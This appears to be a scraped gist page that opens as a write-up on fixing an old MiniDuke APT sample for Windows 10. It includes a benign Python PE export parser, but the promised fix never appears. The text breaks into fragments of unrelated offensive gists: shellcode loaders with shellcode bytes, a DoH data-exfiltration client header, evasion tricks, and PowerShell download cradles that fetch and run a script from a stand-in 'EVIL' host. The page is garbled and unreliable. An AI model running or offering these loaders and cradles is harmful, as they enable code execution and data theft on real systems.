Hossam Ehab 0xHossam
Fixing an APT sample so it can work on Modern Windows versions - An Exercise in Reverse Engineering

Sample

I stumbled upon an old MiniDuke APT sample and found that it has some cool tricks. I won't be explaining how the malware works or what it does; instead I will focus on a code flaw in the sample that caused a crash I ran into while debugging it on Windows 10, and on how we can fix it, which takes some reverse engineering and coding (I will use C and assembly).

To give a quick introduction: the sample is a 32-bit DLL with a single export named 'JorPglt', which is the entry point of the payload. The sample also employs a few simple code-mutation / instruction-level obfuscations, which we will discuss as well.
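Because the whole exercise starts from locating that single export, here is an added example (not code from this gist or from the sample itself) that walks a PE32 export directory by hand, the way you would to confirm the entry export before attaching a debugger. To run offline it first builds a minimal 32-bit DLL image in memory carrying one export; the export name 'JorPglt' comes from the text, while the DLL name 'sample.dll', the image base and the function RVA 0x1F00 are constructed placeholders and not the real sample's layout.

```python
# Added example: hand-rolled PE32 export-directory walk. build_pe32_dll() only
# exists to give the parser a constructed, offline input; its dll name, image
# base and function RVA (0x1F00) are assumptions, not the real sample's values.
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C   # COFF Machine for x86
IMAGE_FILE_DLL = 0x2000           # COFF Characteristics bit: image is a DLL
PE32_MAGIC = 0x10B                # optional-header magic for 32-bit images
SECT_ALIGN, FILE_ALIGN = 0x1000, 0x200


def build_pe32_dll(exports, dll_name=b"sample.dll"):
    """Constructed input: minimal PE32 DLL, one .rdata section holding the export table."""
    n, sec_rva = len(exports), SECT_ALIGN
    addr_funcs = sec_rva + 40                 # the export directory itself is 40 bytes
    addr_names = addr_funcs + 4 * n
    addr_ords = addr_names + 4 * n
    str_rva = addr_ords + 2 * n
    strings, name_rvas = bytearray(dll_name + b"\x00"), []
    for name, _ in exports:
        name_rvas.append(str_rva + len(strings))
        strings += name + b"\x00"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, str_rva, 1, n, n,
                       addr_funcs, addr_names, addr_ords)
    body += b"".join(struct.pack("<I", rva) for _, rva in exports)   # AddressOfFunctions
    body += b"".join(struct.pack("<I", r) for r in name_rvas)        # AddressOfNames
    body += b"".join(struct.pack("<H", i) for i in range(n))         # AddressOfNameOrdinals
    body += strings
    exp_size = len(body)
    raw_size = -(-exp_size // FILE_ALIGN) * FILE_ALIGN
    dos = bytearray(b"MZ").ljust(64, b"\x00")
    struct.pack_into("<I", dos, 0x3C, 64)                            # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224,
                       0x0102 | IMAGE_FILE_DLL)                      # EXECUTABLE | 32BIT | DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 28, 0x10000000)                      # ImageBase (assumed)
    struct.pack_into("<II", opt, 32, SECT_ALIGN, FILE_ALIGN)
    struct.pack_into("<II", opt, 56, sec_rva + SECT_ALIGN, FILE_ALIGN)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                               # Subsystem: WINDOWS_GUI
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, sec_rva, exp_size)              # DataDirectory[EXPORT]
    sect = struct.pack("<8sIIIIIIHHI", b".rdata", SECT_ALIGN, sec_rva, raw_size,
                       FILE_ALIGN, 0, 0, 0, 0, 0x40000040)           # INITIALIZED_DATA | READ
    headers = bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + sect
    return headers.ljust(FILE_ALIGN, b"\x00") + body.ljust(raw_size, b"\x00")


def rva_to_offset(sections, rva):
    """Map an RVA to a file offset through the section table; unmapped RVAs raise."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    raise ValueError(f"RVA {rva:#x} not backed by any section")


def read_cstr(data, off):
    return data[off:data.index(b"\x00", off)].decode("ascii")


def parse_exports(data):
    """Return (dll_name, is_32bit_dll, {export_name: function_rva}) for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    is_32bit_dll = (machine == IMAGE_FILE_MACHINE_I386 and magic == PE32_MAGIC
                    and bool(chars & IMAGE_FILE_DLL))
    exp_rva, exp_size = struct.unpack_from("<II", data, opt + 96)   # export data directory
    sections = []
    for i in range(nsect):
        _, vsize, vaddr, raw_size, raw_ptr, *_ = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((vaddr, vsize, raw_ptr, raw_size))
    if exp_rva == 0:
        return None, is_32bit_dll, {}            # image has no export table at all
    ed = rva_to_offset(sections, exp_rva)
    _, _, _, _, name_rva, _, _, nnames, af, an, ao = struct.unpack_from("<IIHHIIIIIII", data, ed)
    funcs, names, ords = (rva_to_offset(sections, r) for r in (af, an, ao))
    exports = {}
    for i in range(nnames):
        name = read_cstr(data, rva_to_offset(sections, struct.unpack_from("<I", data, names + 4 * i)[0]))
        ordinal = struct.unpack_from("<H", data, ords + 2 * i)[0]   # index into AddressOfFunctions
        func_rva = struct.unpack_from("<I", data, funcs + 4 * ordinal)[0]
        if exp_rva <= func_rva < exp_rva + exp_size:
            continue                             # points back into the export dir: a forwarder, not code
        exports[name] = func_rva
    return read_cstr(data, rva_to_offset(sections, name_rva)), is_32bit_dll, exports


if __name__ == "__main__":
    img = build_pe32_dll([(b"JorPglt", 0x1F00)])   # 0x1F00 is a constructed placeholder RVA
    print(parse_exports(img))
```

To check a real file, feed `parse_exports(open(path, "rb").read())` and add the image base to the RVA you get back to set a breakpoint on the export. The forwarder check matters on real DLLs: a function RVA that lands inside the export directory is an ASCII "DLL.Function" forwarder string, not code, and treating it as an entry point is a classic way to end up at a bogus address in the debugger.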

So, without going into much detail, here is where the code flaw resides:

import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
// author: daax
// 0x4a65 = 19045 (windows version)
int main()
{
PSAPI_WORKING_SET_INFORMATION* w = ( PSAPI_WORKING_SET_INFORMATION* ) malloc( 1 << 20 );
QueryWorkingSet( GetCurrentProcess(), w, 1 << 20 );
for ( u32 i = 0; i < w->NumberOfEntries; i++ )
if ( ( w->WorkingSetInfo[ i ].Flags & 31 ) == 4 )
for ( u8* p = ( u8* ) ( ( w->WorkingSetInfo[ i ].Flags >> 12 ) << 12 ),
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "winmm.lib")
void Nothing(WORD wKey)
{
}
void PrintKey(WORD wKey)
@0xHossam
0xHossam / client.py
Last active November 1, 2025 21:21
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
# Info: Stealthy Data Exfiltration Using (DoH) - Client Code
# Date: May 26, 2024
# Author: Hossam
import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet
@RistBS
RistBS / shellcode_exec_workerfactory.c
Last active April 23, 2025 19:32
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@susMdT
susMdT / Program.cs
Created March 1, 2023 18:55
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
@dr4k0nia
dr4k0nia / HInvoke.cs
Last active April 11, 2025 17:01
A very minimalistic approach of calling .net runtime functions or accessing properties using only hashes as identifiers. It does not leave any strings or import references since we dynamically resolve the required member from the mscorlib assembly on runtime. Read the blog post: https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avo…
using System.Linq;
using System.Reflection;
namespace HashInvoke;
public class HInvoke
{
public static T InvokeMethod<T>(uint classID, uint methodID, object[]? args = null)
{
// Get the System assembly and go through all its types, hashing their names
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active December 1, 2025 12:37
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object